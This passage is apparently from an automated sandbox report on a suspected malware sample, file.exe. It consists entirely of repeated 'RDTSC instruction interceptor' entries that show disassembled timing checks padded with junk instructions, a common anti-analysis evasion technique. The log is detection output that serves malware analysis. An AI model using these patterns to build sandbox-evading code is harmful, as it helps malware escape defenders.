                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C21059 second address: C2105D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2E7BC second address: C2E7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2E7C4 second address: C2E7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3C087 second address: C3C096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jnp 00007FF624B4E7D6h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F926 second address: C3F92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F92A second address: C3F92E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F92E second address: C3F954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FF624C75314h 0x0000000c jmp 00007FF624C75308h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F954 second address: C3F958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F958 second address: C3F95E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59271 second address: C5927D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FF624B4E7D6h 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5927D second address: C59293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59293 second address: C592B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C58317 second address: C58323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF624C752F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C58323 second address: C5832E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF624B4E7D6h 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5832E second address: C58334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C58334 second address: C58338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C58338 second address: C58354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75302h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C58354 second address: C5835E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF624B4E7D6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5835E second address: C5836A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5836A second address: C58374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5BC28 second address: C5BC2D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5BCC0 second address: C5BCC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5BCC8 second address: C5BCCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5BF03 second address: C5BF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E8h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D450 second address: C5D49A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75305h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FF624C75304h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007FF624C75301h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D49A second address: C5D49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D49E second address: C5D4A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5EC9A second address: C5ECA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C800F0 second address: 4C800F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C800F4 second address: 4C801A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF624B4E7E4h 0x00000010 sbb esi, 457E0F98h 0x00000016 jmp 00007FF624B4E7DBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FF624B4E7E8h 0x00000022 or al, FFFFFFF8h 0x00000025 jmp 00007FF624B4E7DBh 0x0000002a popfd 0x0000002b popad 0x0000002c call 00007FF624B4E7E8h 0x00000031 movzx eax, dx 0x00000034 pop edi 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 mov di, AA6Eh 0x0000003c mov esi, ebx 0x0000003e popad 0x0000003f xchg eax, ebp 0x00000040 jmp 00007FF624B4E7E1h 0x00000045 mov ebp, esp 0x00000047 jmp 00007FF624B4E7DEh 0x0000004c pop ebp 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jmp 00007FF624B4E7DDh 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C801A9 second address: 4C801AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C801AE second address: 4C801BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DAh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60EE7 second address: 4C60EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FEh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60EF9 second address: 4C60EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60EFD second address: 4C60F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx esi, di 0x0000000d jmp 00007FF624C752FFh 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF624C752FBh 0x0000001f xor cl, FFFFFFDEh 0x00000022 jmp 00007FF624C75309h 0x00000027 popfd 0x00000028 mov dx, si 0x0000002b popad 0x0000002c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40100 second address: 4C40105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40105 second address: 4C40139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF624C752FDh 0x0000000a adc cl, FFFFFFD6h 0x0000000d jmp 00007FF624C75301h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov dh, D5h 0x0000001c mov bx, si 0x0000001f popad 0x00000020 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40139 second address: 4C401A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1CA73BC2h 0x00000008 mov ebx, 76B1520Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 movzx esi, di 0x00000015 jmp 00007FF624B4E7E7h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007FF624B4E7E6h 0x00000021 mov ebp, esp 0x00000023 jmp 00007FF624B4E7E0h 0x00000028 push dword ptr [ebp+04h] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FF624B4E7DAh 0x00000034 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C401A0 second address: 4C401A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C401A4 second address: 4C401AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C401AA second address: 4C401E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF624C752FCh 0x00000009 and eax, 249DD548h 0x0000000f jmp 00007FF624C752FBh 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+0Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF624C752FBh 0x00000024 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C401E1 second address: 4C401E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C401E7 second address: 4C401EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C401EB second address: 4C401EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4022E second address: 4C4023E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FCh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4023E second address: 4C40242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40242 second address: 4C40257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF624C752FAh 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40257 second address: 4C4025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60CB0 second address: 4C60CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60CB4 second address: 4C60CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60CB8 second address: 4C60CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60CBE second address: 4C60CE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 1D6ACFE1h 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF624B4E7E4h 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60822 second address: 4C6085C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF624C75302h 0x00000013 add si, 9398h 0x00000018 jmp 00007FF624C752FBh 0x0000001d popfd 0x0000001e mov ebx, esi 0x00000020 popad 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C606EC second address: 4C606F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C606F0 second address: 4C60703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60703 second address: 4C60749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 920Ah 0x00000007 pushfd 0x00000008 jmp 00007FF624B4E7DBh 0x0000000d adc eax, 565C98AEh 0x00000013 jmp 00007FF624B4E7E9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF624B4E7DDh 0x00000024 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60749 second address: 4C60776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624C75303h 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60776 second address: 4C60793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60793 second address: 4C607A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FCh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C607A3 second address: 4C607A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C604A5 second address: 4C604B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7039E second address: 4C703A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80488 second address: 4C804A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804A3 second address: 4C804CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF624B4E7DDh 0x0000000f mov eax, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF624B4E7DDh 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804CC second address: 4C804D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 2612h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804D5 second address: 4C804F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 and dword ptr [eax], 00000000h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624B4E7E1h 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804F4 second address: 4C804FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804FA second address: 4C80549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF624B4E7DAh 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FF624B4E7DBh 0x0000000f xor si, AB6Eh 0x00000014 jmp 00007FF624B4E7E9h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d and dword ptr [eax+04h], 00000000h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF624B4E7DDh 0x00000028 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80549 second address: 4C80565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF624C75307h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80565 second address: 4C80575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov bh, 99h 0x0000000d push esi 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80575 second address: 4C8058B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75302h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60626 second address: 4C6062A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6062A second address: 4C60645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60645 second address: 4C6066E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, E9h 0x00000005 mov ah, F5h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FF624B4E7E5h 0x00000013 pop esi 0x00000014 mov dx, ACC4h 0x00000018 popad 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6066E second address: 4C606AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d call 00007FF624C752FEh 0x00000012 movzx ecx, di 0x00000015 pop edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 movzx ecx, dx 0x0000001c popad 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF624C752FEh 0x00000027 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C606AC second address: 4C606B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C606B2 second address: 4C606B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80008 second address: 4C8000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8000C second address: 4C80023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80023 second address: 4C80053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007FF624B4E7DAh 0x00000010 mov dword ptr [esp], ebp 0x00000013 pushad 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF624B4E7E0h 0x00000020 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80053 second address: 4C80062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80062 second address: 4C8007A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E4h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8007A second address: 4C80096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a call 00007FF624C752FDh 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C802C0 second address: 4C802D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0673 second address: 4CA0679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0679 second address: 4CA06FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF624B4E7E4h 0x00000013 adc ecx, 7D0E5B08h 0x00000019 jmp 00007FF624B4E7DBh 0x0000001e popfd 0x0000001f mov bh, al 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 mov si, 7D77h 0x00000028 jmp 00007FF624B4E7DCh 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f jmp 00007FF624B4E7E0h 0x00000034 mov ebp, esp 0x00000036 jmp 00007FF624B4E7E0h 0x0000003b xchg eax, ecx 0x0000003c pushad 0x0000003d mov si, D99Dh 0x00000041 mov cx, 7299h 0x00000045 popad 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA06FE second address: 4CA070E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
